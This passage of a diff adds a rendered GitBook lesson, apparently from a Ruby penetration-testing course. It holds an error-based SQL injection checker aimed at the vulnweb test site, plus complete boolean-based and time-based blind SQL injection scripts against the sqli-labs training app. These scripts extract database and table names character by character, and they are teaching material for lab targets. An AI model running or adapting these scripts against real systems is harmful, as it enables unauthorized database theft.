+                 <span class="hljs-string">&quot;Microsoft SQL Native Client error.*&quot;</span>
+                ],
+      <span class="hljs-symbol">:oracle</span> =&gt; [
+                  <span class="hljs-string">&quot;.*ORA-[0-9].*&quot;</span>,
+                  <span class="hljs-string">&quot;Warning&quot;</span>
+                 ]
+      }
+
+<span class="hljs-comment"># Try a known vulnerable site</span>
+uri  = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">&quot;http://testphp.vulnweb.com/artists.php?artist=1&quot;</span>
+
+<span class="hljs-comment"># Update the query with a payload</span>
+uri.query += payloads[<span class="hljs-number">0</span>]
+
+<span class="hljs-comment"># Send get request</span>
+response = <span class="hljs-constant">Net::HTTP</span>.get uri
+
+<span class="hljs-comment"># Search if an error occurred = vulnerable</span>
+puts <span class="hljs-string">&quot;[+] The <span class="hljs-subst">#{<span class="hljs-constant">URL</span>.decode(uri.to_s)}</span> is vulnerable!&quot;</span> <span class="hljs-keyword">unless</span> response.match(<span class="hljs-regexp">/<span class="hljs-subst">#{errors[<span class="hljs-symbol">:mysql</span>][<span class="hljs-number">0</span>]}</span>/i</span>).<span class="hljs-keyword">nil</span>?
+</code></pre>
+<p>Try it on this URL (<a href="http://testasp.vulnweb.com/showforum.asp?id=0" target="_blank">http://testasp.vulnweb.com/showforum.asp?id=0</a>)</p>
+<p>Results</p>
+<pre><code>ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
+[+] The http://testphp.vulnweb.com/artists.php?artist=1&apos; is vulnerable!
+</code></pre><h2 id="booleanbases-sqli-exploit-script"><a name="booleanbases-sqli-exploit-script" class="plugin-anchor" href="#booleanbases-sqli-exploit-script"><span class="fa fa-link"></span></a>Boolean-bases SQLi Exploit Script</h2>
+<p>Here is a Boolean-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
+<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
+<span class="hljs-comment"># Boolean-based SQLi exploit</span>
+<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
+<span class="hljs-comment">#</span>
+<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
+
+<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
+  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
+  exit <span class="hljs-number">0</span>
+<span class="hljs-keyword">else</span>
+  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
+<span class="hljs-keyword">end</span>
+
+<span class="hljs-comment"># Just colorizing outputs</span>
+<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
+<span class="hljs-keyword">end</span>
+
+<span class="hljs-comment"># SQL injection</span>
+<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_bbsqli</span><span class="hljs-params">(url, query)</span></span>
+  <span class="hljs-keyword">begin</span>
+
+    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
+
+    <span class="hljs-keyword">if</span> !response.read.scan(<span class="hljs-string">&quot;You are in...........&quot;</span>).empty?
+      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
+    <span class="hljs-keyword">end</span>
+
+  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
+    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
+    exit <span class="hljs-number">0</span>
+  <span class="hljs-keyword">end</span>
+<span class="hljs-keyword">end</span>
+
+url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-8/index.php?id=&quot;</span>
+
+puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
+
+extracted = []
+(<span class="hljs-number">1</span>..<span class="hljs-number">100</span>).map <span class="hljs-keyword">do</span> |position|
+  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
+     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
+
+     <span class="hljs-comment"># Put your query here </span>
+<span class="hljs-comment">#      query = &quot;1&apos; AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+&quot;</span>
+     query = <span class="hljs-string">&quot;1&apos; AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>--+&quot;</span>
+     result = send_bbsqli(url, query)
+         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
+           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
+
+           extracted &lt;&lt;  char.chr
+           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
+           <span class="hljs-keyword">break</span> 
+         <span class="hljs-keyword">end</span>
+   <span class="hljs-keyword">end</span>
+<span class="hljs-keyword">end</span>
+
+puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
+</code></pre>
+<h2 id="timebases-sqli-exploit-script"><a name="timebases-sqli-exploit-script" class="plugin-anchor" href="#timebases-sqli-exploit-script"><span class="fa fa-link"></span></a>Time-bases SQLi Exploit Script</h2>
+<p>A Time-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
+<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
+<span class="hljs-comment"># Boolean-based SQLi exploit</span>
+<span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
+<span class="hljs-comment">#</span>
+<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
+
+<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
+  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
+  exit <span class="hljs-number">0</span>
+<span class="hljs-keyword">else</span>
+  host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
+<span class="hljs-keyword">end</span>
+
+<span class="hljs-comment"># Just colorizing outputs</span>
+<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
+  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span>  &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
+<span class="hljs-keyword">end</span>
+
+<span class="hljs-comment"># SQL injection</span>
+<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_tbsqli</span><span class="hljs-params">(url, query, time2wait)</span></span>
+  <span class="hljs-keyword">begin</span>
+    start_time = <span class="hljs-constant">Time</span>.now
+    response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
+    end_time   = <span class="hljs-constant">Time</span>.now
+    howlong    = end_time - start_time
+
+    <span class="hljs-keyword">if</span> howlong &gt;= time2wait
+      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
+    <span class="hljs-keyword">end</span>
+
+  <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
+    puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red 
+    exit <span class="hljs-number">0</span>
+  <span class="hljs-keyword">end</span>
+<span class="hljs-keyword">end</span>
+
+url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-10/index.php?id=&quot;</span>
+
+puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
+time2wait = <span class="hljs-number">5</span>
+extracted = []
+(<span class="hljs-number">1</span>..<span class="hljs-number">76</span>).map <span class="hljs-keyword">do</span> |position| 
+  (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
+     puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
+
+     <span class="hljs-comment"># Put your query here </span>
+     query = <span class="hljs-string">&quot;1\&quot; AND IF((ASCII(SUBSTR((SELECT DATABASE()),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>, SLEEP(<span class="hljs-subst">#{time2wait}</span>), NULL)--+&quot;</span>
+
+     result = send_tbsqli(url, query, time2wait)
+         <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
+           puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
+
+           extracted &lt;&lt;  char.chr
+           puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
+           <span class="hljs-keyword">break</span> 
+         <span class="hljs-keyword">end</span>
+   <span class="hljs-keyword">end</span>
+<span class="hljs-keyword">end</span>
+
+puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
+</code></pre>
+
+                    
+                    </section>
+                
+                
+                </div>
+            </div>
+        </div>
+
+        
+        <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-prev " aria-label="Previous page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-left"></i></a>
+        
+        
+        <a href="../module_0x4__web_kung_fu/databases.html" class="navigation navigation-next " aria-label="Next page: Databases"><i class="fa fa-angle-right"></i></a>
+        
+    </div>
+</div>
+
+        
+<script src="../gitbook/app.js"></script>
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
+    
+
+    
+    <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
+    
+
+<script>
+require(["gitbook"], function(gitbook) {
+    var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
+    gitbook.start(config);
+});
+</script>
+
+        
+    </body>
+    
+</html>